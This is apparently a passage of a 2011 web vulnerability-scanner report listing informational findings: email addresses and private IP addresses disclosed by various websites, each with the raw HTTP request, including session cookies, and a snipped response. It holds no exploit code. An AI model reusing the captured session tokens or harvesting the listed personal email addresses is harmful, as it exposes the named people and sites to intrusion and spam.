Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.12.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:56 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 05:36:02 GMT
ETag: "320aa-4a153000c3480"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:13:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 204970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<br />
rino@itinfosec.com<br />
...[SNIP]...
<br />
sales@itinfosec.com <br />
support@itinfosec.com <br />
...[SNIP]...
<br />
Phone : prasad@gammainfowayexalt.com</p>
...[SNIP]...
<br />
Email ID: dragon@kisang.co.kr / mpark@kisang.co.kr
<br />
...[SNIP]...

25.30. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketgid.com
Path:   /pnews/773204/i/7269/pp/2/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /pnews/773204/i/7269/pp/2/1/ HTTP/1.1
Host: www.marketgid.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MGformStatus=2; __utma=250877338.2141066310.1303423654.1303423654.1303423654.1; __utmz=250877338.1303423654.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral; __gads=ID=909f464f6199feed:T=1303423666:S=ALNI_MY6fIaxdoRzO_fDyTrK1Li9f5G69A; __qca=P0-972785183-1303423664935

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:31:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: no-cache, must-revalidate
Content-Length: 48728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<!--Rating@Mail.ru COUNTEr-->
...[SNIP]...

25.31. http://www.netsuite.com/portal/javascript/DD_roundies.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netsuite.com
Path:   /portal/javascript/DD_roundies.js

Issue detail

The following email address was disclosed in the response:

Request

GET /portal/javascript/DD_roundies.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/ecommerce/website-hosting.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NS_VER=2011.1.0; __utmz=1.1303742452.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=k23zN1HJzNw2PWHTMzr6q1LqT1Q41y9Tz2M0V9JvpTH0mJ5TfxDLbGQpDm2qpc2ThmqSMyK39KWhLDnCtK6fYxHWtxqSfGGZGG53PyJw5wXyXYk1y7kppJz4hQqHll7q!-577847599; NLVisitorId=rcHW8495Af7oGhFy; NLShopperId=rcHW8495AQLpGtOI; bn_u=6923519460848807096; __utma=1.1781939456.1303742452.1303742452.1303742452.1; __utmc=1; __utmb=1.5.10.1303742452; mbox=session#1303736347554-914602#1303745022|PC#1303736347554-914602.17#1304952762|check#true#1303743222; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fpage_not_found.shtml%22%2C%22r%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fpages%2Fportal%2Fpage_not_found.jspinternal%3DT%22%2C%22t%22%3A1303743275975%2C%22u%22%3A%226923519460848807096%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fecommerce%2Fwebsite-hosting.shtml%22%2C%22l%22%3A%22Ecommerce%20-%20SEO%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20for%20mid-sized%20businesses%20adds%20advanced%20accounting%2C%20customer%20relationship%20management%2C%20and%20SFA%20to%20the%20NetSuite%20family.%20Includes%3A%20NetSuite%20Accounting%2C%20NetSuite%20CRM%2C%20NetSuite%20SFA%2C%20NetSuite%20Knowledge%20Base%2C%20and%20NetSuite%20Vendor%20Center.%22%2C%22ti%22%3A%22NetSuite%20%7C%20Form%22%2C%22nw%22%3A173%2C%22nl%22%3A46%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 16853
Content-Disposition: inline;filename="DD_roundies.js"
NS_RTIMER_COMPOSITE: -1584260967:73686F702D6A6176613031312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: application/octet-stream; charset=UTF-8
Cache-Control: max-age=2390
Date: Mon, 25 Apr 2011 14:54:25 GMT
Connection: close

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_roundies/
* Version: 0.0.2a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_roundies/#license
*
* Usage:
* DD_roundies.ad
...[SNIP]...

25.32. http://www.praetorian.com/contactus.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.praetorian.com
Path:   /contactus.html

Issue detail

The following email address was disclosed in the response:

Request

GET /contactus.html HTTP/1.1
Host: www.praetorian.com
Proxy-Connection: keep-alive
Referer: http://www.praetorian.com/external-network-penetration-test.html?gclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116139463.1303735969.2.2.utmgclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=116139463.239124078.1303732836.1303732836.1303735969.2; __utmc=116139463; __utmb=116139463.1.10.1303735969

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:09:55 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 17907
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<a href="mailto:info@praetorian.com">info@praetorian.com</a>
...[SNIP]...
<a href="mailto:info@praetorian.com">info@praetorian.com</a>
...[SNIP]...

25.33. http://www.smpone.com/Static-contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /Static-contact.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Static-contact.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Sections-read-126.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.10.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733897

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733901; expires=Mon, 25-Apr-2011 12:28:21 GMT; path=/
Content-Type: text/html
Content-Length: 14568

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners Information Security Consultants - Contact Inf
...[SNIP]...
<a href="mailto:sales@smpone.com">
...[SNIP]...
<a href="mailto:hr@smpone.com?">
...[SNIP]...

25.34. http://www.smpone.com/javascript/common.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smpone.com
Path:   /javascript/common.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /javascript/common.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 5596

/*************************************************
   . Copyright 2006 - 2009 Tres Media Group, Inc.
   The code contained within cannot be reproduced
   or modified without the expressed permission of:
   Tres Media Group, Inc. 5105 Hwy 33 Farmingdale,
   NJ 07727 USA 732-751-0253
   erik@tresware.com or dave@tresware.com
*************************************************/

/*************************************************
   This file last updated: 11/19/2008 4:00:08 PM
****************************************
...[SNIP]...

25.35. http://www.stillsecure.com/m/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stillsecure.com
Path:   /m/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /m/?c=contact-us HTTP/1.1
Host: www.stillsecure.com
Proxy-Connection: keep-alive
Referer: http://www.stillsecure.com/company/testimonials.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80d1802a2bda40500b441aefe0709f80; __utmz=183052004.1303732858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183052004.352557952.1303732858.1303732858.1303732858.1; __utmc=183052004; __utmb=183052004.8.10.1303732858

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 11:58:24 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.7h-fips PHP/5.2.1
X-Powered-By: PHP/5.2.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 17059

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title></title>
<style type="text/css" media="sc
...[SNIP]...
<a href="mailto:sales@stillsecure.com">sales@stillsecure.com</a>
...[SNIP]...
<a href="mailto:support@stillsecure.com">support@stillsecure.com</a>
...[SNIP]...
<a href="mailto:bherman@stillsecure.com">bherman@stillsecure.com</a>
...[SNIP]...
<a href="mailto:soc@stillsecure.com">soc@stillsecure.com</a>
...[SNIP]...

25.36. http://www.tresware.com/javascript/bbcode.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /javascript/bbcode.php

Issue detail

The following email address was disclosed in the response:

Request

GET /javascript/bbcode.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2394

function x() {
   return;
}

var thisForm;

function mozWrap(txtarea, lft, rgt, pmt, pmr) {
   var selLength = txtarea.textLength;
   var selStart = txtarea.selectionStart;
   var selEnd = txtarea.se
...[SNIP]...
my_link + "]";
       rgt="[/url]";
       wrapSelection(txtarea, lft, rgt, "Link Name", "Here");
   }
   return;
}

function wrapSelectionWithEmail(txtarea) {
   var my_link = prompt("Enter Email Address:","you@address.com");
   if (my_link != null) {
       lft="[email=" + my_link + "]";
       rgt="[/email]";
       wrapSelection(txtarea, lft, rgt, "Text", "Email");
   }
   return;
}

function wrapSelectionWithImage(txtarea, lft,
...[SNIP]...

25.37. http://www.tresware.com/javascript/common.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tresware.com
Path:   /javascript/common.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /javascript/common.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 1364

/*************************************************
   . Copyright 2006 - 2008 Tres Media Group, Inc.
   The code contained within cannot be reproduced
   or modified without the expressed permission of:
   Tres Media Group, Inc. 5105 Hwy 33 Farmingdale,
   NJ 07727 USA 732-751-0253
   erik@tresware.com or dave@tresware.com
*************************************************/

/*************************************************
   This file last updated: 5/23/2008 1:21:13 PM
*************************************************/

...[SNIP]...

25.38. http://www.trucklist.ru/cars/&rnd=7005287  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /cars/&rnd=7005287

Issue detail

The following email address was disclosed in the response:

Request

GET /cars/&rnd=7005287 HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=134141457.1303741282.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=134141457.1874277008.1303741282.1303741282.1303741282.1; __utmc=134141457; __utmb=134141457.1.10.1303741282

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:53:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:53:26 GMT
Content-Length: 44657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru">
<head>
   <meta htt
...[SNIP]...
<!--Rating@Mail.ru COUNTER-->
...[SNIP]...

25.39. http://www.trucklist.ru/cars/trucks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /cars/trucks

Issue detail

The following email address was disclosed in the response:

Request

GET /cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:37:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1b167314767bdffd9a5c5c390d79c0cc; path=/; domain=trucklist.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: records_per_page=30; expires=Tue, 24-Apr-2012 14:22:59 GMT; path=/; domain=.trucklist.ru
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:23:12 GMT
Content-Length: 139769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru">
<head>
   <meta htt
...[SNIP]...
<!--Rating@Mail.ru COUNTER-->
...[SNIP]...

25.40. http://www.trucklist.ru/cars/undefined  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /cars/undefined

Issue detail

The following email address was disclosed in the response:

Request

GET /cars/undefined HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30; __utmz=94358872.1303741294.1.1.utmcsr=y_direct|utmccn=truck|utmcmd=cpc; __utma=94358872.676514869.1303741294.1303741294.1303741294.1; __utmc=94358872; __utmb=94358872.1.10.1303741294; subscribe_list_data=%7B%22type%22%3A%22SearchAds%22%2C%22category%22%3A%2245%22%2C%22region%22%3A%226586%22%2C%22filter_currency%22%3A%222715%22%2C%22filter_photo%22%3A%220%22%7D

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:53:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:38:37 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
<!--Rating@Mail.ru COUNTER-->
...[SNIP]...

25.41. http://www.trucklist.ru/webroot/delivery/js/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /webroot/delivery/js/jquery.cookie.js?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:40:54 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 4246
Last-Modified: Thu, 25 Jun 2009 06:27:50 GMT
Connection: keep-alive
Expires: Wed, 25 May 2011 14:40:54 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

26. Private IP addresses disclosed  previous  next
There are 16 instances of this issue:


26.1. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&urls=%5B%22http%3A%2F%2Fwww.eset.com%2Fus%2Fhome%2Fsmart-security%22%5D&format=json&callback=fb_sharepro_render HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/home/smart-security
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Mon, 25 Apr 2011 08:19:37 -0700
Pragma:
X-FB-Rev: 370179
X-FB-Server: 10.32.37.111
X-Cnection: close
Date: Mon, 25 Apr 2011 15:17:37 GMT
Content-Length: 290

fb_sharepro_render([{"url":"http:\/\/www.eset.com\/us\/home\/smart-security","normalized_url":"http:\/\/www.eset.com\/us\/home\/smart-security","share_count":122,"like_count":99,"comment_count":62,"to
...[SNIP]...

26.2. http://games.mochiads.com/c/g/moon-volley/mvolley.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.mochiads.com
Path:   /c/g/moon-volley/mvolley.swf

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /c/g/moon-volley/mvolley.swf HTTP/1.1
Host: games.mochiads.com
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-shockwave-flash
Content-Length: 75083
Last-Modified: Fri, 15 Oct 2010 08:34:09 GMT
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.47:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.105:40049
